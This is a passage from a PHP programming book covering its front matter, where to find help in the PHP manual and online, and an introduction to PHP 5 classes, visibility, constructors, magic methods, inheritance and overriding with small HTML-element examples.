     To run all the examples you will also need a web server, database server, email
     server and FTP server, although instructions for their installation and configuration
     are out of scope for this book. If you want to setup a software environment for
     learning PHP you can’t go past the XAMPP
     (http://www.apachefriends.org/en/xampp.html) server package for ease of installation
     and use. It is also available for a variety of operating systems.

     The Windows version of XAMPP has all of the following components (and more)
     wrapped up in a single package with a convenient web interface for management:

     ■	 PHP 5 and PEAR
     ■	 Apache HTTP Server: http://httpd.apache.org/
     ■	 MySQL Database Server: http://mysql.org/
     ■	 Mercury Mail Transport System: http://www.pmail.com/
     ■	 Filezilla FTP server: http://filezilla-project.org/

     Some examples in the book make specific use of the Apache HTTP Server and
     MySQL Database Server.


     The Book’s Web Site
     Located at http://www.sitepoint.com/books/phpant2/, the web site that supports
     this book will give you access to the following facilities.

     The Code Archive
     As you progress through this book, you’ll note file names above many of the code
     listings. These refer to files in the code archive, a downloadable ZIP file that contains
     all of the finished examples presented in this book. Simply click the Code Archive
     link on the book’s web site to download it.
xxi


Updates and Errata
No book is error-free, and attentive readers will no doubt spot at least one or two
mistakes in this one. The Corrections and Typos page on the book’s web site3 will
provide the latest information about known typographical and code errors, and will
offer necessary updates for new releases of browsers and related standards.


The SitePoint Forums
If you’d like to communicate with other web developers about this book, you should
join SitePoint’s online community.4 The PHP forum,5 in particular, offers an
abundance of information above and beyond the solutions in this book, and a lot
of fun and experienced PHP developers hang out there. It’s a good way to learn new
tricks, get questions answered in a hurry, and just have a good time.


The SitePoint Newsletters
In addition to books like this one, SitePoint publishes free email newsletters includ­
ing The SitePoint Tribune, The SitePoint Tech Times, and The SitePoint Design
View. Reading them will keep you up to date on the latest news, product releases,
trends, tips, and techniques for all aspects of web development. Sign up to one or
more SitePoint newsletters at http://www.sitepoint.com/newsletter/.


Your Feedback
If you can’t find an answer through the forums, or if you wish to contact us for any
other reason, the best place to write is books@sitepoint.com. We have an email
support system set up to track your inquiries, and friendly support staff members
who can answer your questions. Suggestions for improvements as well as notices
of any mistakes you may find are especially welcome.


Conventions Used in this Book
You’ll notice that we’ve used certain typographic and layout styles throughout this
book to signify different types of information. Look out for the following items.

3
  http://www.sitepoint.com/books/phpant2/errata.php
4
  http://www.sitepoint.com/forums/
5
  http://www.sitepoint.com/forums/forumdisplay.php?f=34
xxii


       Code Samples
       Code in this book will be displayed using a fixed-width font like so:

        <h1>A perfect summer's day</h1>

        <p>It was a lovely day for a walk in the park. The birds 

        were singing and the kids were all back at school.</p>



       If the code may be found in the book’s code archive, the name of the file will appear
       at the top of the program listing, like this:

                                                                                  example.css

        .footer {
          background-color: #CCC;
          border-top: 1px solid #333;
        }



       If only part of the file is displayed, this is indicated by the word excerpt:

                                                                         example.css (excerpt)

          border-top: 1px solid #333;



       Some lines of code are intended to be entered on one line, but we’ve had to wrap
       them because of page constraints. A ➥ indicates a line break that exists for formatting
       purposes only, and should be ignored.

        URL.open("http://www.sitepoint.com/blogs/2007/05/28/user-style-she

        ➥ets-come-of-age/");
xxiii



Tips, Notes, and Warnings


    Hey, You!
   Tips will give you helpful little pointers.



    Ahem, Excuse Me …
   Notes are useful asides that are related—but not critical—to the topic at hand.
   Think of them as extra tidbits of information.



    Make Sure you Always …
   … pay attention to these important points.



    Watch Out!
   Warnings will highlight any gotchas that are likely to trip you up along the way.
The PHP Anthology
1
                                                   Chapter




Introduction
PHP is a programming language that’s designed specifically for building web sites,
and is both blessed and cursed with being remarkably easy to learn and use. Getting
started is extremely simple. Before long, the typical beginner can put together a
simple web site and experiment with the wealth of open source projects available
through resources like SourceForge.1

Unfortunately, the ease with which PHP-based sites can be developed also means
that you can quickly get yourself into trouble. As traffic to your site increases—along
with the demand for more features and greater complexity—it’s important to gain
a more intimate understanding of PHP, and to research application designs and
techniques that have proved successful on large web sites. Of course, you can’t leap
into programming and expect to know it all straight away. And even if you could,
where would be the fun in that?

In this first chapter, I’ll assume you’ve had a basic grounding in PHP, such as that
provided in the first few chapters of SitePoint’s introductory PHP title Build Your




1
    http://sourceforge.net/
2   The PHP Anthology

    Own Database Driven Website Using PHP & MySQL,2 and instead concentrate on
    the essentials of “getting around” in PHP.

    In this chapter, you’ll find out where to get help—a defense against those that bark
    “Read the manual!” at you—and take a quick tour of PHP 5 object oriented syntax
    and concepts. Not everything here fits under the heading of “basic”—there may also
    be a few surprises in store for the more experienced PHP developers, so keep your
    eyes peeled!

    Be warned, though, that although the discussion of PHP syntax isn’t the most invig­
    orating of subjects, it is essential to prepare for later chapters. If you start to struggle,
    remember the lesson from The Karate Kid: you must learn “wax on, wax off” before
    you can perform the crane kick.


    Where do I get help?
    PHP is the most widely-used web scripting language, running on over 20 million
    web sites. For an open source technology that lacks any corporate funding whatso­
    ever, its popularity may seem inexplicable. Yet PHP’s success is no mystery; it has
    one of the most active and helpful online communities of any technology. Recent
    estimates place the number of PHP developers worldwide at around 500,000 and,
    given the nature of the medium, it’s fair to assume that a large proportion are active
    online. In other words, for developers of PHP-based web sites, help is only ever a
    few clicks away.

    Solution
    There are numerous PHP resources available on the Web today, not the least of
    which is the official PHP Manual.3

    RTFM: Read the Fine Manual
    There’s a well-known, four-letter acronym, RTFM, which tends to be used to harass
    beginners in all areas of computing. While I can understand veterans might be un­
    willing to repeat endlessly the same, well-documented instructions, I think the basic
    assumption should be that we all know how to read the manual in the first place.



    2
        http://www.sitepoint.com/books/phpmysql1/
    3
        http://www.php.net/
Introduction     3

The documentation for PHP is excellent, and is maintained by volunteers who
dedicate themselves to keeping it up to date, understandable, and relevant. The
online version is extremely easy to navigate and contains further know-how in the
form of annotations from developers across the globe. The manual is one of the
areas in which PHP is truly exceptional; software houses like Sun and Microsoft
still have a long way to go to provide this quality of material to developers working
on their platforms.

The manual is also available in twenty-four different languages but as you’re reading
this book I’ll assume you’re happy with the English version of the manual. It’s
broken into five main sections plus appendices. It’s worth knowing what kinds of
information can be found where—at least within the first five sections, which are
the most relevant to the typical PHP developer.

I. Getting Started and II. Installation and Configuration

■ http://www.php.net/getting-started/
■ http://www.php.net/install/

These sections are where a true beginner starts. Section I has a basic introduction
to PHP, explaining what PHP is and what it can do, as well as providing a simple
tutorial to show how PHP works. Section II shows how to perform a basic installation
of PHP on various operating systems in detail.

III. Language Reference

■ http://www.php.net/langref/

This section covers the fundamentals of PHP as a programming language. Some of
these are essential to your ability to achieve anything with PHP, while others become
useful as you look for ways to improve your technique. Reading the whole lot in
one sitting may well be like reading a dictionary. Fortunately, it’s possible to absorb
much of the information contained in the language reference by reading the wealth
of tutorials available online, and examining the code that’s used in open source
PHP applications. Certainly, as you read this book, I hope you’ll pick up a thing or
two about getting the most out of PHP. However, it’s worth familiarizing yourself
with the subjects contained in this section of the manual, and keeping them in the
back of your mind for future reference.
4   The PHP Anthology

    IV. Security

    ■ http://www.php.net/security/

    This is a very important chapter for beginners and experienced coders alike. Con­
    taining information on configuration settings, file system and database security,
    and general “good practices,” it’s a must for all coders. Most security problems stem
    from the code, not PHP itself, so being paranoid is a good thing for any coder! The
    earlier in your PHP coding experience you become familiar with this section of the
    documentation, the better. After all, it’s easier to learn a good habit than to break a
    bad one.

    V. Features

    ■ http://www.php.net/features/

    Covered in this section are the core elements of PHP that are generally focused on
    solving specific web-related problems. Much of the Features section reads like an
    “executive summary” and, from a developer’s point of view, the information con­
    tained here may be easier to understand when you see it in action—for instance, in
    the examples we’ll see throughout this book.

    VI. Function Reference

    ■ http://www.php.net/funcref/

    This section makes up the real body of the manual, covering all aspects of the
    functionality available within PHP. This is where you’ll spend most of your time
    as you progress with PHP, so you’ll be glad to hear that the PHP group has made a
    concerted effort to make this section easy to use. It’s even fun, in an idle moment,
    just to trawl the manual and be amazed by all the things you can do with PHP. Yes,
    I did just describe reading a manual as “fun!”

    The function reference is broken into subsections that cover various categories of
    functions, each category corresponding to a PHP extension. Apart from the core
    language syntax, most parts of PHP are grouped into extensions representing discrete
    functionality.
Introduction     5

PHP Extensions
The notion of an extension can be a little confusing to start with, as many are dis­
tributed with the standard PHP installation. The String functions, which we’d be
hard-pressed to live without, are a case in point. In general, the PHP group distributes
as part of the default PHP installation all the extensions it regards as being essential
to developers.

Extensions that are regarded as nonessential functionality (that is, they’ll be required
by some, but not all developers) must be added separately. The important information
about each installation appears under the Installation heading on the extension’s
main page. Core extensions require no installation, as they’re included with the
PHP core; the documentation clearly indicates whenever this is the case with the
sentence, “There is no installation needed to use these functions; they are part of
the PHP core.” Nonstandard extensions are found in the PECL Repository.4 PECL,
the PHP Extension Community Library, is a directory of all known PHP extensions.
The process for finding and installing PECL extensions is explained in the Installa­
tion and Configuration section of the manual.

Access to information within the Function Reference is available through the Search
field (at the manual’s top right) and by searching within the Function List.

Note that searching within the Function List examines only the Function Reference
section of the manual. To search the entire manual, you need to search within Online
Documentation.

Another handy way to move around the manual is to take short cuts directly to
functions by submitting the name of the topic you’re interested in via the URL. For
example, try entering the following in your browser’s address field:
http://www.php.net/strings/. This will take you to
http://www.php.net/manual/en/ref.strings.php, which is the main page for the
Strings extension. At the bottom of the page, you’ll see a list of all the functions
that the extension makes available.

Taking the strpos function as an example, enter the URL
http://www.php.net/strpos/ (which takes you to




4
    http://pecl.php.net/
6   The PHP Anthology

    http://www.php.net/manual/en/function.strpos.php). You’ll see the information
    shown in Figure 1.1.




                         Figure 1.1. The documentation page for strpos on php.net


    The first line contains the name of the function, while the second line lists the PHP
    versions in which the function is available. The third line tells us what the function
    actually does. In this case, it’s a fairly terse explanation, but strpos really isn’t a
    subject that many can get excited about.

    Under the Description heading is perhaps the most important line of all—the func­
    tion’s signature. The signature describes the parameters—the required and optional
    values this function accepts—and the return value, which is the value we receive
    after the function has run. Reading from left to right, we have int, which tells us
    that the value returned by the function is an integer (in this case, the position of
    one piece of text within another). Next comes the name of the function itself, and
    then, in parentheses, the parameters this function takes, separated by commas.

    Let’s look at the parameter string $haystack. This says that the first argument—the
    value supplied to a parameter—should be a string value, while $haystack simply
    names the argument so that it can be referred to in the detailed description. Note
Introduction     7

that the third argument is placed inside square brackets, which means it’s optional
(that is, you don’t have to supply this argument). Here’s a simple example that
shows this function at work:

                                                                     helloworld.php

 <?php
 $haystack = 'Hello World!';
 $needle   = 'orld';
 $position = strpos($haystack, $needle);
 echo 'The substring "' . $needle . '" in "' .
     $haystack . '" begins at character ' . $position;
 ?>



Notice that here, I’ve used strpos similarly to the way it appears in the manual. I
used the variable names $haystack and $needle to make clear the way each relates
to the explanation in the manual, but you can use whatever variable names you
like.

The function signature convention is used consistently throughout the manual, so
once you’re used to it, you’ll quickly be able to grasp how to use functions you
haven’t tried before.

User Comments
You’ll find user-submitted comments at the bottom of each page in the manual.
Usually, at the very least, you’ll see an example that shows how the function is
used—information which may solve the particular dilemma you’ve run into. In
many cases, you’ll also find alternative explanations and uses for a function, which
help to broaden your understanding. Just keep in mind that the user comments are
not part of the official documentation, so some of the comments may not be entirely
truthful. Usually, any that are factually dubious are later corrected and clarified.

Other Resources
Outside the manual, there are literally thousands of online resources from which
you can get further help. I would dare to say that 99% of all the common problems
you’ll encounter with PHP have already been faced by someone, somewhere, and
their resolutions are available online. This means that the most obvious (but some­
times forgotten) place to begin looking is Google, where a quick search for PHP
strpos problem will give you an idea of what I mean.
8   The PHP Anthology

    There are also some excellent sites where you can get answers directly from other
    PHP developers (for free, of course—it’s part of the PHP ethic). Perhaps the three
    biggest English-language resources are:

    ■ SitePoint Forums, at http://www.sitepointforums.com/
    ■ Dev Shed Forums, at http://forums.devshed.com/
    ■ phpBuilder, at http://www.phpbuilder.com/board/

    Each of these sites hosts online discussions and, as such, has a very friendly, easy-
    to-use interface. All have very active memberships and you should find most of
    your questions answered within 24 hours. Before you post a question or use one of
    the other methods listed later to find help, be sure to read How To Ask Questions
    The Smart Way to help you do the homework for your question.5

    Note that when you ask for help on forums, the principle of helping others to help
    yourself comes to the fore. One of the most common mistakes that beginners make
    when posting a question is to post a message that says, “This script has a problem,”
    and paste your entire PHP script below. Instead, it’s much better to narrow the
    problem down—identify the area where you’re having problems, and paste in this
    code snippet, along with other relevant information such as error messages, the
    purpose of the code, your operating system, and so on. The people who offer help
    generally don’t want to spend more than a few minutes on your problem (they’re
    doing it for free, after all), so saving them time will improve your chances of receiving
    a helpful answer.

    Also available to those with an IRC (Internet Relay Chat) client are numerous IRC
    channels dedicated to PHP development. Two of the more popular channels are
                       6                             7
    #php on efnet.org, and ##php on freenode.net. These resources can provide imme­
    diate assistance for your problem but, like the forums, the channels’ users will expect
    you to have done your homework beforehand.

    Less convenient, but perhaps the most effective last resorts are the PHP mailing
    lists,8 where beginners are encouraged to use the PHP General User list.9 The lists


    5
      http://www.catb.org/~esr/faqs/smart-questions.html
    6
      http://efnet.org/
    7
      http://freenode.net/
    8
      http://www.php.net/mailing-lists.php
    9
      http://news.php.net/group.php?group=php.general
Introduction        9

are available for limited browsing, though it’s possible to search some of them using
the Search tool on the PHP web site, and selecting the list of your choice from the
search results.

Zend,10 the company developing the core of the PHP engine, also hosts a fairly
active forum for general PHP questions.11 Of course, if you want a guaranteed answer,
it’s worth investigating paid support options. More information can be found on
the Zend Network web site.12


What is OOP?
Just tackling the basics of object oriented programming, or OOP, could easily con­
stitute a whole book—and there are plenty of those out there to prove it! A vast
range of information is likely to be covered in any discussion of object oriented
programming, so this section will provide a quick overview to help you to understand
the basic concepts and to prepare you for the rest of the book. It’s not meant to be
a comprehensive primer, but rather is intended to initiate you into the world of
OOP.

Solution
The object oriented programming paradigm is an approach to programming that’s
intended to encourage the development of well-structured and maintainable applic­
ations. Many PHP coders regard object oriented programming as some kind of
mystical art, given that examples of PHP frequently use only a procedural ap­
proach.13

This is a shame, as there is much to be gained from adopting an object oriented
approach to developing PHP applications, perhaps the most important benefit of
which is code reuse. A well-written piece of object oriented code can easily be
employed to solve the same problem in other projects; we can simply slot it in
whenever we need it. There’s a growing number of object oriented code repositor­




10
   http://www.zend.com/

11
   http://www.zend.com/forums/

12
   http://www.zend.com/core/network/

13
   Procedural programming is the name given to non-object-oriented programming approaches to problem

solving that aim to break a programming task into a collection of subroutines.
10   The PHP Anthology

     ies—such as PEAR14 and PHP Classes15—that can save you hours of slaving over
     well-charted problems, and leave you free to focus on the specifics of your applica­
     tion.

     With the release of PHP 5, we’ve gained a greatly enhanced object model that
     provides improved performance and features that weren’t available in PHP 4. In
     practice, learning to use the object model provided by PHP requires us to achieve
     two goals, which usually have to be undertaken simultaneously:

     ■ You’ll need to learn the PHP class syntax and object oriented terminology.
     ■ You must make the mental leap from procedural to object oriented code.

     The first step is easy; after all, it’s just a matter of memorization. The second
     step—the mental leap—is both easy and challenging. Once you take the leap, you’ll
     no longer think about long lists of tasks that a single script should accomplish; in­
     stead, you’ll see programming as putting together a set of tools to which your script
     will delegate work.

     Classes Explained
     A class is a generic blueprint of something. “Of what?” you ask. Well, of just about
     anything: a car, a customer, a product, a button; any object that’s relevant to the
     application. A class is not actually an object. Instead, it defines the methods (or
     behaviors) and properties (or attributes, or state) of the object. A class is a plan that’s
     used to create an object just as the blueprint of a car is used to build a car—it’s
     simply a plan to achieve the desired product.

     The PHP Manual contains a wealth of information on OOP,16 but if you have no
     knowledge of OOP, the best place to start trying to understand it is with the basic
     PHP class syntax.17 Let’s take a closer look at classes by creating one ourselves.
     Let’s create a very simple class called HTMLParagraph that outputs an HTML para­
     graph element. Now, you may be wondering, “What use is a class that does so little?”
     But please bear with me through this gentle introduction—I promise it’s building
     to something useful!


     14
        http://pear.php.net/

     15
        http://www.phpclasses.org/

     16
        http://www.php.net/oop5/

     17
        http://www.php.net/manual/en/language.oop5.basic.php
Introduction     11

To begin with, we start with the keyword class, followed by the name of the
class—in this case, HTMLParagraph. Then we use opening and closing braces to
delimit where the class begins and ends:

                                                          HTMLParagraph.php (excerpt)

 <?php
 class HTMLParagraph
 {
   ⋮ properties and methods in here
 }
 ?>



We can add properties and methods between these braces. Properties, also known
as member variables, are the attributes that will be available to the objects created
from this class. They hold the data values that the objects will need in order to
function. For example, an object created from the HTMLParagraph class will need a
property to store the contents of the paragraph. We declare this property to be private
using the private modifier, which we’ll discuss further on. By convention, and for
readability, properties are declared at the start of the class:

                                                          HTMLParagraph.php (excerpt)

 <?php
 class HTMLParagraph
 {
   private $content;
   ⋮ methods under here
 }
 ?>



Methods describe the actions the objects will enable us to perform. The methods
of a class contain the instructions that the objects will need in order to function.
Let’s add some methods to our HTMLParagraph class:

                                                          HTMLParagraph.php (excerpt)

 <?php
 class HTMLParagraph
 {
12   The PHP Anthology


        private $content;


        public function __construct($content = '')

        {

          $this->content = $content;

        }


        public function getSource()

        {

          return '<p>' . $this->content . '</p>';

        }


        ⋮ possibly more methods under here
      }

      ?>




     Here, we’ve added two methods to our class—__construct and getSource.
     __construct is a special method that initializes our objects for us, while getSource
     is a method that allows our HTMLParagraph objects to fulfill their purpose: to write
     a paragraph element in HTML.

     Methods can be seen as communication: an object can call a method on another
     object and receive an answer in return. For example, an object can call the getSource
     method on an object created from our HTMLParagraph class, and receive the HTML
     source for the paragraph element in response. The HTMLParagraph object takes care
     of all the details for us.

     As we’ve seen, methods are the actual workers of the class—its behaviors or actions.
     For example, our HTMLParagraph class has a getSource method to assemble the
     content into a valid HTML paragraph element. A method’s job is to do one thing
     and one thing only—and to do it well.

     The syntax for a method is straightforward (note that brackets indicate optional
     syntax):

      public|protected|private [static] function methodName([$param1[,

      ➥ $param2]]){…}
Introduction     13

Encapsulation and Visibility
Encapsulation is a basic concept of object oriented programming that dictates that
a class should have a public interface and a private implementation. The public
interface is the appearance—put simply, the methods and properties—possessed
by an object created from the class, which all other objects can see and use. The
private implementation refers to the inner workings of the class, which only the
objects created from that class need to know about. The separation of the class’s
inner workings from its outer appearance is essential for the production of quality
object oriented code.

Users of your class should be able to use the class’s public interface, or API (Applic­
ation Programming Interface), without caring what’s inside, and with confidence
that they’ll obtain the desired output. Hiding the inner workings of a class from the
user ensures that we can change those internals as required over time—to fix bugs,
improve performance, or completely change how the method is implemen­
ted—without causing interference or disruption to users. Think of a class as a black
box: users just plug their data into the object and receive the results they want.

We indicate the public interface and private implementation of our class by describ­
ing the visibility of its properties and methods—in short, describing who can see
and access them. PHP 5 has three levels of visibility: public, protected, and private.
The public visibility level allows any object or script to see and use the attribute or
method.18 Protected visibility means that only those classes which inherit (we’ll
discuss the concept of inheritance in the pages to come) from the class, as well as
the class itself, can see the attribute or method. The private visibility level describes
cases in which only the class itself can see the method or attribute. Note that in our
example class the properties are private and the methods are public.

When you’re beginning to learn object oriented programming, there’s often some
degree of temptation to make all your classes public and to avoid thinking about
encapsulation at all. However, it’s important for other users of your class to know
how your class should be used, and what behavior they can expect—they’ll assume
that everything that’s public is safe for them to use. Obviously, if you then change
those public classes, you can cause a lot of problems! So, to meet the objective of



18
  Technically speaking, a method doesn’t need a visibility level. If none is provided, the method is
automatically public.
14   The PHP Anthology

     encapsulation we must reduce the visibility of all our properties and methods to
     the lowest possible levels.

     Constructors and Destructors
     A constructor is a special method that’s used when we first instantiate or create
     the object. The constructor method is named __construct no matter what the class’s
     name is. Since the constructor is called when we create an object from a class, it’s
     in this method that we set any default values for the object’s properties—also referred
     to as instance variables, the properties of a specific instance of a class—or anything
     else that’s needed to initialize the object. In our example class, we initialized the
     various properties that we needed in order to create the paragraph element. Another
     common example is an order class for a shopping cart—the cart is initialized in the
     __construct method, where the customer number is set, the number of items in
     the cart is set to zero, and the cart balance is set to zero dollars.

     A destructor is the constructor’s complement. Like the constructor, the destructor
     has a special name, __destruct, that’s used no matter what the class’s name is.
     __destruct is also a special method that runs immediately before an object is des­
     troyed. It’s in the destructor that we tie up any loose ends we may have, for instance,
     closing a database connection or a file handler.

     Magic Methods
     __construct and __destruct are examples of what are known as magic methods.
     Magic methods are a collection of methods that perform special internal PHP class
     functions. They all begin with __ (double underscore) and you can read more about
     them in The PHP Manual.19 For example, the __toString method is called when
     an object created from the class is converted to a string. This comes in very handy,
     as you will see.

     Creating Objects
     Now that we know what a class is, it’s time to talk about objects. As we saw earlier
     in this chapter, an object is the item that’s created or, in object oriented terminology,
     instantiated, using the class as the blueprint. Thus the object is the actual imple­
     mentation of the class. Because of this, we can instantiate multiple objects of the
     same class, each with its own individual characteristics and states—just as a single


     19
          http://www.php.net/manual/en/language.oop5.magic.php
Introduction      15

blueprint can be used to build multiple cars. The cars may all be the same make
and model, but they’re all driving at different speeds, and have different mileage
totals.

Let’s look at some code that will help clarify the concept of objects:

                                                           HTMLParagraph.php (excerpt)

 $para = new HTMLParagraph('Hello world!');
 echo $para->getSource();



In the first line above, I instantiate the object with the new keyword, being sure to
pass along any data that the constructor will need. Basically, that line of code in­
structs PHP to use the HTMLParagraph class to make a new object, and place that
object in the $para variable.

Since the object in $para is an implementation of the HTMLParagraph class, it has
all the functionality and properties of that class. The output of the above code listing
will be:

 <p>Hello world!</p>



The $this Variable
Now that we understand the difference between an object and class, I want to back
up a bit. In the HTMLParagraph class file, you’ll find that the $this variable appears
in the class methods—the getSource method, for example:

                                                           HTMLParagraph.php (excerpt)

 public function getSource()
 {
   return '<p>' . $this->content . '</p>';
 }



Within any method, including the constructor, the $this variable points to the object
in which the method is running, and allows the method to access other methods
and variables that belong to that particular object. So even though we may have two
HTMLParagraph objects running the same class function code, when we call the
16   The PHP Anthology

     getSource function on one of them, $this will point to the object that owns the
     function we called—the one in which we’re retrieving the HTML source. The other
     object’s connection will remain open.

     The -> (arrow) operator is the syntax we use to access an attribute or method that’s
     named within the object. You can use this operator to access an object’s own prop­
     erties and methods within the script, as well as within the object itself.

     Treating an Object Like a String
     If you recall, the __toString method is called when an object created from the class
     is converted to a string. This will be very handy for our HTMLParagraph as it’ll allow
     our paragraph objects to be used in string concatenation. Here’s our __toString
     method:

                                                              HTMLParagraph.php (excerpt)

      public function __toString()
      {
        return $this->getSource();
      }



     Our __toString method calls the getSource method, which returns the HTML
     source for our paragraph. So now it’s possible to use it in this way:

                                                              HTMLParagraph.php (excerpt)

      <?php
      $para2 = new HTMLParagraph('The __toString method makes life' .
          ' easy!');
      echo "<h1>The Magic __toString Method</h1>n";
      echo $para2;
      ?>



     The output from the above code listing will be:
      <h1>The Magic __toString Method</h1>

      <p>The __toString method makes life easy!</p>
Introduction     17

Inheritance
Inheritance is another of the fundamental pieces of the object oriented paradigm
and is an important aspect of its expressive power. The term refers to a relationship
in which one class is defined as being a child or subclass of another. The child class
inherits the methods and properties defined in the parent class, and can change
them or add more of its own. Inheritance allows you to define the common methods
and properties of a class that you’d like all the child classes to share.

Our HTMLParagraph class creates an adequate HTML paragraph element, but there
are a lot more HTML elements besides paragraphs and they all share some common
features. Let’s create a parent class called HTMLElement and add all the common
methods and properties:

                                                       HTMLElement.class.php (excerpt)

 <?php
 class HTMLElement
 {
   protected $content;
   protected $tagname;
   protected $attributes;



Thinking about the common properties of HTML elements, we add two new prop­
erties $tagname and $attributes to store the tag name and attributes of the
HTMLElement respectively. Notice that I’ve declared the properties protected. This
allows child classes to have access in order to redefine them. If we’d declared the
properties private, the child classes wouldn’t be able to access them.

The __construct method now takes a second argument for the element attributes:

                                                       HTMLElement.class.php (excerpt)

   public function __construct($content, $attributes = array())
   {
     $this->content = $content;
     $this->attributes = $attributes;
   }
18   The PHP Anthology

     Our new getSource method now has all the smarts to create the source for any
     HTML element as long as the $tagname property is defined:

                                                         HTMLElement.class.php (excerpt)

        public function getSource()
        {
          return '<' . $this->tagname . $this->getAttributeSource() . '>'.
              $this->content .
              '</' . $this->tagname . '>';
        }



     The getSource method will also loop through the attributes array and assemble the
     HTML source string for the element’s attributes. It does this by calling the
     getAttributeSource method.

     The getAttributeSource method builds and returns the source string for the HTML
     element’s attributes, if any are present:

                                                         HTMLElement.class.php (excerpt)

        public function getAttributeSource()
        {
          $attributes = '';
          if (count($this->attributes)) {
            foreach ($this->attributes as $attrnme => $attrval)
            {
              $attributes .= ' ' . $attrnme . '="' . $attrval . '"';
            }
          }
          return $attributes;
        }



     Finally, the __toString magic method remains the same as the previous version—it
     already does what we need it to, and it can be used for any HTML element:
Introduction     19

                                                    HTMLElement.class.php (excerpt)

   public function __toString()
   {
     return $this->getSource();
   }
 }
 ?>



You can see that marking our HTMLParagraph class as a child of HTMLElement will
be far easier than building the HTMLParagraph class from scratch—most of the work
has already been done for us. We use the extends keyword to indicate the relation­
ship:

                                                  HTMLParagraph.class.php (excerpt)

 <?php
 require_once 'HTMLElement.class.php';
 class HTMLParagraph extends HTMLElement
 {
   protected $tagname = 'p';
   public function __construct($content, $attributes = array())
   {
     parent::__construct($content, $attributes);
   }
 }
 ?>



HTMLParagraph is now a child of HTMLElement. Alternatively, we could say that
HTMLElement is the parent or superclass of HTMLParagraph. We’ve redefined the
$tagname property and changed the constructor method. Just ignore the
parent::__construct($content, $attributes); part for now, I’ll explain it very
soon.

Now we can instantiate the child class, gain access to the getSource method,
and—because we’ve redefined the $tagname property—the HTML source is output
appropriately for an HTML paragraph element:
20   The PHP Anthology

                                                                  childClass.php (excerpt)

      <?php
      require 'HTMLParagraph.class.php';

      $para = new HTMLParagraph("The object oriented programmingn" .
          " paradigm is an approach to programming that's intendedn" .
          " to encourage the development of well-structured andn" .
          " maintainable applications.",
          array(
            'id' => 'oop_intro',
            'class' => 'introduction'
          )
      );
      echo "<h1>OOP in PHP 5</h1>n";
      echo $para;
      ?>



     The output for the above code will be:

      <h1>OOP in PHP 5</h1>

      <p id="oop_intro" class="introduction">The object oriented

      ➥	 programming

       paradigm is an approach to programming that's intended

       to encourage the development of well-structured and

       maintainable applications.</p>



     This example shows the basics of how inheritance works, but the real power of this
     capability cannot be demonstrated without discussing overriding—the mechanism
     by which a child class can alter the methods and properties of its parent class.

     Overriding Methods and Properties
     It’s perfectly acceptable to give a method or property in the child class the same
     name as a method or property in the parent class, or to override the method or
     property. In our HTMLParagraph class we override the $tagname property of the
     parent HTMLElement class. When we call HTMLParagraph->getSource and it grabs
     the $tagname value, it retrieves the overridden value p.

     To demonstrate, let’s create another child class; I give you the HTMLImage class.
     HTML image tags are constructed slightly differently—they have no end tag—so
     we’ll need to override the getSource method to handle this unique situation:
Introduction   21

                                                                    HTMLImage.class.php (excerpt)

 <?php
 class HTMLImage extends HTMLElement
 {
   ⋮ the usual properties and constructor function

       public function getSource()
       {
         return '<'. $this->tagname . $this->getAttributeSource() .' />';
       }




           Overriding a Method? Watch your Arguments!
         When a child class overrides a method, PHP prefers (though it doesn’t require)
         the child class method to have the same number of arguments as the parent class
         method. If the number of arguments differs between the child and parent class
         versions of the method, your code will remain perfectly legal in terms of object
         oriented programming, and it’ll still run perfectly. However, it will cause an
         E_STRICT error to appear if E_STRICT warnings are enabled in php.ini.20


You can also have the child class make use of the parent class’s method or property
internally, even while overriding it. To ensure our classes produce quality HTML
I want to make sure all image elements have an alt attribute, even if it’s only to
alert the developer that it’s missing. We’ll override the getAttributeSource method:

                                                                    HTMLImage.class.php (excerpt)

       public function getAttributeSource()
       {
         if (!array_key_exists('alt',$this->attributes)) {
           $this->attributes['alt'] = 'This image needs alt text';
         }
         return parent::getAttributeSource();
       }
 }
 ?>



20
     E_STRICT warnings are defined by The PHP Manual as “Run-time notices. Enable [these notices]
to have PHP suggest changes … which will ensure the best interoperability and forward-compatib­
ility of your code.” [http://www.php.net/errorfunc/]
22   The PHP Anthology

     We can use the parent keyword and the :: operator to call the parent class’s
     method. This trick saves us from duplicating functionality already contained in the
     parent class. Note that we can call the parent class by name to achieve exactly the
     same result. For example, the above parent method call could have also been written
     like this:

      return HTMLElement::getAttributeSource();



     Here, we’ve replaced the parent keyword with the name of the HTMLElement class.
     Although the output is exactly the same, using parent saves us from having to re­
     member the name of the parent class while working in the child, and is the recom­
     mended syntax.21


                Overriding Constructors
              Most object-oriented languages—Java, for example—will run the constructor of a
              given parent class automatically, before running an overriding constructor in a
              child class. This behavior is known as cascading constructors.

              PHP doesn’t have this feature. If you create a constructor in a child class in PHP,
              be aware that you’re completely overriding the parent class’s constructor. You
              must call that constructor explicitly from your new constructor, for example, using
              parent::__construct(), if you want the parent class to handle its share of the
              object’s initialization.


     We can see overriding in action in this example:

                                                                                 overriding.php (excerpt)

      <?php
      require 'HTMLImage.class.php';
      $logo = new HTMLImage('',
          array(
            'id' => 'logo',
            'src' => 'php.gif'
          )


     21
          PHP’s double colon operator (::) is called the scope resolution operator, or Paamayim Nekudotayim.
     This may seem like a strange choice for naming a double-colon, but while writing the Zend Engine 0.5
     (which powers PHP 3), that’s what the Zend team decided to call it. It actually does mean double-
     colon—in Hebrew!
Introduction     23


 );

 echo $logo;

 ?>




The above code will output the following:

 <img id="logo" src="php.gif" alt="This image needs alt text" />



If you examine the output, you can see that the HTMLImage->getAttributeSource
method has outputted the appropriate attributes as per our intention.

Object Aggregation and Composition
In addition to inheritance, objects can interact in other ways; for example, one object
